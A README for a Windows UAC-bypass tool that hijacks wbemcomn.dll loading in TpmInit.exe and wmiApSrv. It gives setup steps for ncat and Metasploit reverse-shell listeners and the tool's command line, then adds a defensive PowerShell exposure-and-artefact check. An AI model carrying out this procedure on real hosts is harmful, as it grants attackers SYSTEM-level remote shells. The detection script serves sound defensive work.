TpmInitUACBypass is a tool to bypass User Account Control (UAC) and obtain a High Integrity (or SYSTEM) reverse command shell, reverse PowerShell session, or reverse Meterpreter session.

When TpmInit.exe starts, it first tries to load wbemcomn.dll from C:\Windows\System32\wbem. The DLL is not found in that folder, so it retries the load from C:\Windows\System32. A DLL dropped into C:\Windows\System32 under that name is therefore loaded by TpmInit.exe, which runs auto-elevated by default; this tool exploits that DLL-loading vulnerability. The same issue applies to the WMI Performance Adapter service (wmiApSrv), which runs with SYSTEM privileges. So besides using TpmInit.exe to get an elevated shell, the tool can also start the wmiApSrv service and get a SYSTEM shell through the same custom DLL.

Like every UAC bypass built on auto-elevation, this only works for an account that is a member of the local Administrators group, and not when UAC is set to "Always notify".
This version has been successfully tested on Windows 8.1 x64 and Windows 10 x64 (version 1511).
+ Metasploit Framework (only needed for the msf option; a plain Netcat/Ncat listener is enough for cmd and powershell)

* First download TpmInitUACBypass.zip
* Set up a remote Netcat, Ncat or Meterpreter (x64) listener, for example

  ncat -lvp 443

  or, for a Meterpreter session, in msfconsole:

  use exploit/multi/handler
  set payload windows/x64/meterpreter/reverse_tcp
  set LHOST 10.0.0.1
  set LPORT 443
  exploit -j

* Then run TpmInitUACBypass.exe <Remote Listener IP> <Port> <powershell, cmd or msf> [system]

  The fourth argument is optional: append the word system to start the wmiApSrv service and get a SYSTEM shell instead of the default High Integrity one.
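The following PowerShell script is an added example and is not code from the TpmInitUACBypass project. It checks, on the target host, the preconditions the procedure above relies on (Administrators membership with a filtered medium-integrity token, UAC below "Always notify", an auto-elevating TpmInit.exe) and looks for the artefact the bypass leaves behind: a wbemcomn.dll in C:\Windows\System32. It assumes the legitimate wbemcomn.dll lives in C:\Windows\System32\wbem and that the local Administrators group SID is S-1-5-32-544; the manifest check is a plain string match over the binary, not a PE parse.

```powershell
# Added example (not part of TpmInitUACBypass): pre-flight and forensic checks
# for the wbemcomn.dll hijack in TpmInit.exe / wmiApSrv.
# Assumption: the legitimate wbemcomn.dll lives in System32\wbem, so a copy
# in System32 itself is what this technique would have planted.

$sys32      = Join-Path $env:SystemRoot 'System32'
$tpmInit    = Join-Path $sys32 'TpmInit.exe'
$plantedDll = Join-Path $sys32 'wbemcomn.dll'        # hijack location
$legitDll   = Join-Path $sys32 'wbem\wbemcomn.dll'   # expected location (assumption)

# --- 1. Account / UAC preconditions ----------------------------------------
# Auto-elevation only helps an account that is in the local Administrators
# group (S-1-5-32-544) but currently runs with the filtered token.
# IsInRole() is true only when the process is already elevated.
$identity      = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal     = New-Object Security.Principal.WindowsPrincipal($identity)
$isAdminMember = $identity.Groups.Value -contains 'S-1-5-32-544'
$isElevated    = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

# UAC policy: EnableLUA=0 means UAC is off; ConsentPromptBehaviorAdmin=2 is
# "Always notify", the one slider position at which Windows does not
# auto-elevate its own binaries (the default value is 5).
$uacKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$uac    = Get-ItemProperty -Path $uacKey -ErrorAction SilentlyContinue
$autoElevateAllowed = ($uac.EnableLUA -eq 1) -and ($uac.ConsentPromptBehaviorAdmin -ne 2)

# --- 2. Is TpmInit.exe present and marked autoElevate in its manifest? ------
# Quick string match on the embedded manifest resource, not a full PE parse.
$tpmInitAutoElevates = $false
if (Test-Path -Path $tpmInit) {
    $bytes = [IO.File]::ReadAllBytes($tpmInit)
    $text  = [Text.Encoding]::ASCII.GetString($bytes)
    $tpmInitAutoElevates = [bool]($text -match '<autoElevate>\s*true\s*</autoElevate>')
}

# --- 3. Forensic check: has something been planted as System32\wbemcomn.dll?
$plantedFound  = Test-Path -Path $plantedDll
$plantedStatus = $null
$plantedSigner = $null
$sameAsLegit   = $null
if ($plantedFound) {
    $sig           = Get-AuthenticodeSignature -FilePath $plantedDll
    $plantedStatus = $sig.Status.ToString()
    $plantedSigner = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '(unsigned)' }
    if (Test-Path -Path $legitDll) {
        $sameAsLegit = (Get-FileHash -Path $plantedDll).Hash -eq (Get-FileHash -Path $legitDll).Hash
    }
}

# --- 4. The SYSTEM path: wmiApSrv runs as LocalSystem ----------------------
$svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='wmiApSrv'" -ErrorAction SilentlyContinue

[pscustomobject]@{
    AdminGroupMember         = $isAdminMember
    AlreadyElevated          = $isElevated
    UacAllowsAutoElevate     = $autoElevateAllowed
    TpmInitAutoElevates      = $tpmInitAutoElevates
    System32_wbemcomn_Found  = $plantedFound
    System32_wbemcomn_SigOK  = $plantedStatus
    System32_wbemcomn_Signer = $plantedSigner
    System32_wbemcomn_IsLegitCopy = $sameAsLegit
    wmiApSrv_State           = $svc.State
    wmiApSrv_RunsAs          = $svc.StartName
    # Non-elevated admin, UAC below "Always notify", auto-elevating TpmInit:
    # exactly the situation the tool needs.
    Exposed = $isAdminMember -and -not $isElevated -and $autoElevateAllowed -and $tpmInitAutoElevates
}
```

Run it from a normal, non-elevated prompt. Exposed = True means the host meets the preconditions of the procedure above; after a suspected incident, a System32\wbemcomn.dll that is unsigned, not signed by Microsoft, or whose hash differs from the copy in System32\wbem is the artefact to hunt for, together with wmiApSrv having been started without an obvious reason.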
Strong Advice: Do not use accounts with Administrative privileges for daily computer usage!